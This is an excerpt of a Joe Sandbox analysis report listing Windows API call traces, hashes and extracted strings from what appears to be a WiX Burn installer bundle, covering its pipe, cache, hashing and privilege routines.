• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • InitializeSecurityDescriptor.ADVAPI32(?,00000001), ref: 0093DAB7
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0093DAC1
                                                                                                                                                                                                                                                                            • CreateWellKnownSid.ADVAPI32(0000001A,00000000,?,?), ref: 0093DB19
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0093DB23
                                                                                                                                                                                                                                                                            • CreateWellKnownSid.ADVAPI32(00000017,00000000,?,?), ref: 0093DB71
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0093DB7B
                                                                                                                                                                                                                                                                            • CreateWellKnownSid.ADVAPI32(00000018,00000000,?,?), ref: 0093DBCC
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0093DBD6
                                                                                                                                                                                                                                                                            • CreateWellKnownSid.ADVAPI32(00000010,00000000,?,?), ref: 0093DC27
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0093DC31
                                                                                                                                                                                                                                                                            • CreateWellKnownSid.ADVAPI32(00000016,00000000,?,?), ref: 0093DC82
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0093DC8C
                                                                                                                                                                                                                                                                            • SetEntriesInAclA.ADVAPI32(00000005,?,00000000,?), ref: 0093DD8E
                                                                                                                                                                                                                                                                            • SetSecurityDescriptorOwner.ADVAPI32(?,?,00000000), ref: 0093DDD9
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0093DDE3
                                                                                                                                                                                                                                                                            • SetSecurityDescriptorGroup.ADVAPI32(?,?,00000000), ref: 0093DE2C
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0093DE36
                                                                                                                                                                                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 0093DE80
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 0093DE8A
                                                                                                                                                                                                                                                                            • CoInitializeSecurity.OLE32(?,000000FF,00000000,00000000,00000006,00000002,00000000,00003000,00000000), ref: 0093DED9
                                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 0093DF10
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$CreateKnownSecurityWell$Descriptor$Initialize$DaclEntriesFreeGroupLocalOwner
                                                                                                                                                                                                                                                                            • String ID: Failed to create ACL for system restore.$Failed to create administrator SID for system restore.$Failed to create local service SID for system restore.$Failed to create local system SID for system restore.$Failed to create network service SID for system restore.$Failed to create self SID for system restore.$Failed to initialize COM security for system restore.$Failed to initialize security descriptor for system restore.$Failed to set DACL for system restore.$Failed to set administrators group access for system restore.$Failed to set administrators owner for system restore.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\srputil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 267631441-1154305825
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32(D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD),00000001,008E6CF2,00000000), ref: 008FBBB4
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(008E73DE,00000000,008E6CF2,00000000,00000000,000000B0,?,?,008E6CF2,00000000,00000000), ref: 008FBBBD
                                                                                                                                                                                                                                                                            • CreateNamedPipeW.KERNEL32(00000000,00080003,00000000,00000001,00010000,00010000,00000001,008E6CF2,008E73DE,00000000,008E6CF2,00000000,00000000,000000B0), ref: 008FBC7D
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?,008E6CF2,00000000,00000000), ref: 008FBC8B
                                                                                                                                                                                                                                                                            • CreateNamedPipeW.KERNEL32(00000000,00080003,00000000,00000001,00010000,00010000,00000001,00000000), ref: 008FBD32
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008FBD3F
                                                                                                                                                                                                                                                                            • CreateNamedPipeW.KERNEL32(00000000,00080003,00000000,00000001,00010000,00010000,00000001,00000000), ref: 008FBDCE
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008FBDD9
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,d:\a\wix4\wix4\src\burn\engine\pipe.cpp,0000012D,00000000), ref: 008FBE27
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,d:\a\wix4\wix4\src\burn\engine\pipe.cpp,0000012D,00000000), ref: 008FBE31
                                                                                                                                                                                                                                                                            • LocalFree.KERNEL32(00000000), ref: 008FBE5F
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$CreateNamedPipe$CloseDescriptorHandleSecurity$ConvertFreeLocalString
                                                                                                                                                                                                                                                                            • String ID: D:(A;;GA;;;SY)(A;;GA;;;BA)(A;;GRGW0x00100000;;;WD)$Failed to allocate full name of cache pipe: %ls$Failed to allocate full name of logging pipe: %ls$Failed to allocate full name of pipe: %ls$Failed to create cache pipe: %ls$Failed to create logging pipe: %ls$Failed to create pipe: %ls$Failed to create the security descriptor for the connection event and pipe.$\\.\pipe\%ls$\\.\pipe\%ls.Cache$\\.\pipe\%ls.Log$d:\a\wix4\wix4\src\burn\engine\pipe.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 2306725211-1427415075
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,?,F0000040,?,?,?,?,?,?), ref: 0093A335
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?), ref: 0093A33F
                                                                                                                                                                                                                                                                            • CryptCreateHash.ADVAPI32(?,?,00000000,00000000,?,?,?), ref: 0093A38D
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?), ref: 0093A397
                                                                                                                                                                                                                                                                            • CryptHashData.ADVAPI32(?,?,?,00000000,?,?), ref: 0093A3F2
                                                                                                                                                                                                                                                                            • ReadFile.KERNEL32(?,?,00001000,?,00000000,?,?), ref: 0093A416
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?), ref: 0093A420
                                                                                                                                                                                                                                                                            • CryptDestroyHash.ADVAPI32(00000000), ref: 0093A473
                                                                                                                                                                                                                                                                            • CryptReleaseContext.ADVAPI32(00000000,00000000), ref: 0093A48A
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?), ref: 0093A4A3
                                                                                                                                                                                                                                                                            • CryptGetHashParam.ADVAPI32(?,00000002,?,?,00000000,?,?), ref: 0093A4EF
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?), ref: 0093A4F9
                                                                                                                                                                                                                                                                            • SetFilePointerEx.KERNEL32(?,00000000,00000000,0000800E,00000001,?,?), ref: 0093A543
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,?), ref: 0093A551
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CryptErrorLast$Hash$ContextFile$AcquireCreateDataDestroyParamPointerReadRelease
                                                                                                                                                                                                                                                                            • String ID: Failed to acquire crypto context.$Failed to get file pointer.$Failed to get hash value.$Failed to hash data block.$Failed to initiate hash.$Failed to read data block.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\cryputil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3955742341-696376830
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 0093B8BC
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0093B8C6
                                                                                                                                                                                                                                                                            • OpenProcessToken.ADVAPI32(?,00000020,?), ref: 0093B91A
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0093B924
                                                                                                                                                                                                                                                                            • AdjustTokenPrivileges.ADVAPI32(00000000,00000000,00000001,00000010,00000000,00000000), ref: 0093B976
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0093B980
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0093B9C4
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0093B9DD
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLast$Token$AdjustCloseHandleLookupOpenPrivilegePrivilegesProcessValue
                                                                                                                                                                                                                                                                            • String ID: Failed to adjust token to add privilege: %ls$Failed to get privilege LUID: %ls$Failed to get process token to adjust privileges.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\procutil.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 1766547789-3772314226
                                                                                                                                                                                                                                                                            • Opcode ID: 5d8674b4ff276782d28de2dd946334ea2e2449dfd67050a10ad49cd98862b03b
                                                                                                                                                                                                                                                                            • Instruction ID: 0dd1e1f2df112718b728b7dde932ce6a54f36be7009b7653148ad5cc16c7348c
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5d8674b4ff276782d28de2dd946334ea2e2449dfd67050a10ad49cd98862b03b
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 13419476E51229A7E72097559C4EFBFBA6CEF06B58F014119BF04BB280E3748D009BE1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FindResourceExA.KERNEL32(?,0000000A,?,00000000), ref: 009469AD
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0090D16B,?,00000001,?,?), ref: 009469B9
                                                                                                                                                                                                                                                                            • LoadResource.KERNEL32(?,00000000,?,0090D16B,?,00000001,?,?), ref: 00946A06
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0090D16B,?,00000001,?,?), ref: 00946A12
                                                                                                                                                                                                                                                                            • SizeofResource.KERNEL32(?,00000000,?,0090D16B,?,00000001,?,?), ref: 00946A4D
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0090D16B,?,00000001,?,?), ref: 00946A59
                                                                                                                                                                                                                                                                            • LockResource.KERNEL32(00000000,?,0090D16B,?,00000001,?,?), ref: 00946A94
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,0090D16B,?,00000001,?,?), ref: 00946AA5
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: ErrorLastResource$FindLoadLockSizeof
                                                                                                                                                                                                                                                                            • String ID: Failed to find resource.$Failed to get size of resource.$Failed to load resource.$Failed to lock data resource.$d:\a\wix4\wix4\src\libs\dutil\wixtoolset.dutil\resrutil.cpp
                                                                                                                                                                                                                                                                            • API String ID: 2627587518-3856033167
                                                                                                                                                                                                                                                                            • Opcode ID: 45cae30e5fe90a2c8725d585c1acb5c2fde7235e2d4d3e14c6ad3cc6a1fb4aa2
                                                                                                                                                                                                                                                                            • Instruction ID: 9252f082056ef5a16763cbce76f0902171cbfbeb69a8d37237251780f9c37247
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 45cae30e5fe90a2c8725d585c1acb5c2fde7235e2d4d3e14c6ad3cc6a1fb4aa2
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A23147BB951A3667D7314A558C09F2B6D6CEB47761F028029FE15FB380E6B4CC0096E2
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\cache.cpp, xrefs: 008FEA91, 008FEAEA, 008FEC97, 008FECBB
                                                                                                                                                                                                                                                                            • Failed to transfer working path to unverified path for payload: %ls., xrefs: 008FEB31
                                                                                                                                                                                                                                                                            • Failed to find payload: %ls in working path: %ls and unverified path: %ls, xrefs: 008FECA9
                                                                                                                                                                                                                                                                            • Aborted transferring working path to unverified path for payload: %ls., xrefs: 008FEB92
                                                                                                                                                                                                                                                                            • Failed to move verified file to complete payload path: %ls, xrefs: 008FEC6A
                                                                                                                                                                                                                                                                            • moving, xrefs: 008FEC25, 008FEC32
                                                                                                                                                                                                                                                                            • Failed to get cached path for package with cache id: %ls, xrefs: 008FEA7F
                                                                                                                                                                                                                                                                            • Failed to reset permissions on unverified cached payload: %ls, xrefs: 008FEBBC
                                                                                                                                                                                                                                                                            • Failed to verify payload: %ls at path: %ls, xrefs: 008FEC0A
                                                                                                                                                                                                                                                                            • Failed to create unverified path., xrefs: 008FEAD8
                                                                                                                                                                                                                                                                            • copying, xrefs: 008FEC2C
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: Aborted transferring working path to unverified path for payload: %ls.$Failed to create unverified path.$Failed to find payload: %ls in working path: %ls and unverified path: %ls$Failed to get cached path for package with cache id: %ls$Failed to move verified file to complete payload path: %ls$Failed to reset permissions on unverified cached payload: %ls$Failed to transfer working path to unverified path for payload: %ls.$Failed to verify payload: %ls at path: %ls$copying$d:\a\wix4\wix4\src\burn\engine\cache.cpp$moving
                                                                                                                                                                                                                                                                            • API String ID: 0-1123430254
                                                                                                                                                                                                                                                                            • Opcode ID: 91e4871543595b545df2fef8fc8c67533e43600a637ce04629d03bde00ce2083
                                                                                                                                                                                                                                                                            • Instruction ID: 38950aab5635eaf67ae1f1bfe5043b6b2e67bc0a7e3f478037eef4a587c9133b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 91e4871543595b545df2fef8fc8c67533e43600a637ce04629d03bde00ce2083
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 18714432680619BBDF229EA58C06FEE7E26FF18B55F110100FF04B51E0D7B19960AB95
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000), ref: 008FDBAC
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008FDBBF
                                                                                                                                                                                                                                                                            • DecryptFileW.ADVAPI32(?,00000000), ref: 008FDD92
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 008FDDA1
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            • Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$CloseCreateDecryptErrorHandleLast
                                                                                                                                                                                                                                                                            • String ID: Failed to open payload at path: %ls$Failed to verify file size for path: %ls$Failed to verify hash of payload: %ls$Failed to verify signature of payload: %ls$Payload has no verification information: %ls$d:\a\wix4\wix4\src\burn\engine\cache.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 3262865546-787582567
                                                                                                                                                                                                                                                                            • Opcode ID: 4a7fc6fc936f28c57211acbfc15ad379d02006c52109919243e83be2a306874d
                                                                                                                                                                                                                                                                            • Instruction ID: 180603f8312aa4838cd0b33572019af23c7e65e293279e2e12946ddec63ce9ce
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4a7fc6fc936f28c57211acbfc15ad379d02006c52109919243e83be2a306874d
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 2751DA3168071ABBDB226E758C0AF7B3A26FF44755F100204BF05E51D0E3A59C60DBE1
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,80000000,00000005,00000000,00000003,08000000,00000000), ref: 008FDA2B
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 008FDA3E
                                                                                                                                                                                                                                                                            • DecryptFileW.ADVAPI32(?,00000000), ref: 008FDB3F
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,00000001,?,00000000,?,?,?,?), ref: 008FDB4E
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: File$CloseCreateDecryptErrorHandleLast
                                                                                                                                                                                                                                                                            • String ID: Container has no verification information: %ls$Failed to open container at path: %ls$Failed to verify hash of container: %ls$d:\a\wix4\wix4\src\burn\engine\cache.cpp$.Wu@1Wu
                                                                                                                                                                                                                                                                            • API String ID: 3262865546-1706856059
                                                                                                                                                                                                                                                                            • Opcode ID: 71bb5982fc2005673f92dc2a6c7cd6f7d935efc3bbcacb48f708a6650016bc80
                                                                                                                                                                                                                                                                            • Instruction ID: 4bffa7d0af95c9c1c9035b5ffb85f878f7449f1d7b50dc389e228bdff472584b
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 71bb5982fc2005673f92dc2a6c7cd6f7d935efc3bbcacb48f708a6650016bc80
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 95313E35680319BBEB329EB98C4FF7E3A16FF45764F110200FB14BA1D1D3A59860DA95
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            • Failed to get OS info., xrefs: 008E9544
                                                                                                                                                                                                                                                                            • d:\a\wix4\wix4\src\burn\engine\variable.cpp, xrefs: 008E9662
                                                                                                                                                                                                                                                                            • Failed to set variant value., xrefs: 008E9650
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FreeLibrary
                                                                                                                                                                                                                                                                            • String ID: Failed to get OS info.$Failed to set variant value.$d:\a\wix4\wix4\src\burn\engine\variable.cpp
                                                                                                                                                                                                                                                                            • API String ID: 3664257935-2618661516
                                                                                                                                                                                                                                                                            • Opcode ID: 5eb46269f3ee4afd4b759b0f01c86db0b12e3b33dda802ab43950031299dad29
                                                                                                                                                                                                                                                                            • Instruction ID: bac8d6d3798d89a1417443333a1a303b690ff512d70f1da0cf6b2562967b7e26
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 5eb46269f3ee4afd4b759b0f01c86db0b12e3b33dda802ab43950031299dad29
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B541A5B1A4515CBBDB218B69CC4AFEE7AB8FB5A714F000159F585E6191D2B0DA40CB90
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
• Associated: 00000000.00000002.1797994465.00000000008E0000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798087787.000000000094E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798131990.000000000097C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.000000000097E000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1798163345.0000000000980000.00000002.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_0_2_8e0000_kXzODlqJak.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                            • String ID: BA aborted cache acquire begin.$BA aborted cache acquire resolving.$Failed to compare '%ls' to '%ls'.$Failed to copy payload: %ls$Failed to determine if payload paths were equivalent, source: %ls, destination: %ls.$Failed to download payload: %ls$Failed to extract container for payload: %ls$Failed to resolve source, payload: %ls, package: %ls, container: %ls$Failed to search local source.$d:\a\wix4\wix4\src\burn\engine\apply.cpp
                                                                                                                                                                                                                                                                            • API String ID: 0-1652660176
                                                                                                                                                                                                                                                                            • Opcode ID: 4f71e9186a04a1ad01f946b304b524d93955574a20159db6861d58b249dcf9db
                                                                                                                                                                                                                                                                            • Instruction ID: 0efeaec68b12c2e27027b103636c180a9f0cc242e82a6527a5c80219315085bb
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4f71e9186a04a1ad01f946b304b524d93955574a20159db6861d58b249dcf9db
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C7224471B0021EEFDB15CF98C981AEEBBB6FF48300F144169E905AB251E771AD91DB90
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 00000000.00000002.1798031043.00000000008E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 008E0000, based on PE: true
